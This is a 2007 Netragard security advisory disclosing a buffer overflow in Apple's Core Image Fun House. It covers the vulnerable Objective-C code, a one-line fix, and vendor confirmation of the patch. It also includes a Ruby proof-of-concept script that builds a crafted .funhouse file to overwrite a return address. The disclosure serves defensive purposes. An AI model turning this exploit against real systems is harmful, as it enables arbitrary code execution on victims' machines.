*************************** NETRAGARD ADVISORY ************************
  		            http://www.netragard.com
	                 The Specialist in Anti-Hacking


SNOSOFT-PRJID-644300606

[Advisory Summary]
-----------------------------------------------------------------------
Advisory Author			: Adriel T. Desautels
Researcher			: Kevin Finisterre
Advisory ID			: NETRAGARD-20070628
Product Name			: Core Image Fun House
Product Version			: <= 2.0 OS X
Vendor Name			: http://www.apple.com
Type of Vulnerability		: Buffer Overflow
Effort (1-10 where 1 == easy)   : 5
Impact				: Arbitrary Code Execution
Vendor Notified			: Yes
Patch Released			: N/A
Discovery Date			: 07/10/2007




[POSTING NOTICE]
-----------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide 
a clickable link back to http://www.netragard.com as the contents of 
this advisory may be updated without notice. 





[Product Description]
-----------------------------------------------------------------------
"From creating new solutions for print, photography, scientific visualization, and film post-production to enhancing your application's user interface with innovative and effortless visual effects, Core Image performs the heavy lifting that enables the next generation of imaging applications."

-- http://developer.apple.com/macosx/coreimage.html  --





[Technical Summary]
-----------------------------------------------------------------------
It is possible to trigger an exploitable buffer overflow condition 
by creating a specially crafted .funhouse file. 





[Technical Details]
-----------------------------------------------------------------------
The Funhouse application does not properly parse XML data. Specifically
it is possible to create a specially crafted .funhouse file that will
trigger and exploit a buffer overflow condition. The code responsible
for the condition is as follows:

// render origin handles using AppKit directly
- (CIImage *)drawPoints:(CIImage *)im
{
...
    NSString *str, *str2, *localizedParameter;
...

        else if ([type isEqualToString:@"image"])
        {
            // image effect stack element
            // show an image origin (in its center)
            CGRect r = [[es imageAtIndex:i] extent];
            NSPoint offset = [es offsetAtIndex:i];
            pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
            pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
            str = [[es filenameAtIndex:i] stringByAppendingString:@" center"];
            [self drawPoint:pt label:str intoContext:cg];
        }

}

The following code is called by the code referenced above:

/*
    Drawing
*/

// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- (void)drawPoint:(NSPoint)pt label:(NSString *)str intoContext:(CGContextRef)cg
{
...
    char cstr[256];
... 
    if (!movingNow)
    {
        [str getCString:cstr];  <-- Vulnerability Exists Here


[Fix]
-----------------------------------------------------------------------
To fix the issue the [str getCString:cstr]; needs to be replaced with
[str getCString:cstr maxLength:254]; to prevent overflows. 

-       [str getCString:cstr];
+       [str getCString:cstr maxLength:254];


[Proof Of Concept]
-----------------------------------------------------------------------
#!/usr/bin/ruby
# Copyright (c) Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:      'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0): 
#        CFPropertyListCreateFromXMLData(): plist parse failed; 
#        the data is notproper UTF-8. The file name for this data 
#        could be:
$
#        /Users/kfinisterre/Desktop/SuperTastey.funhouse/file.xml
#        The parser will retry as in 10.2, but the problem should be
#         corrected in the plist.
#
#  \x80-\xFF range that do not form proper utf8 

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars! 

if File.exist?(fname + ".funhouse/file.xml")
	File.unlink(fname + ".funhouse/file.xml")
	Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSHIT = 
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + 
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" + 
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" + 
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" + 
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"

target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
  f.print(FUNSHIT)  # weeeeee... lets have fun. 
  f.close
}



[Vendor Status]
-----------------------------------------------------------------------
Vendor Notified





[Vendor Comments]
-----------------------------------------------------------------------
This issue is addressed in Xcode tools 3.1.  Credit to Kevin Finisterre
of Netragard for reporting this issue to Apple. Further information is available at: 

http://support.apple.com/kb/HT1222




[Disclaimer]
----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>









SNOSOFT-644300606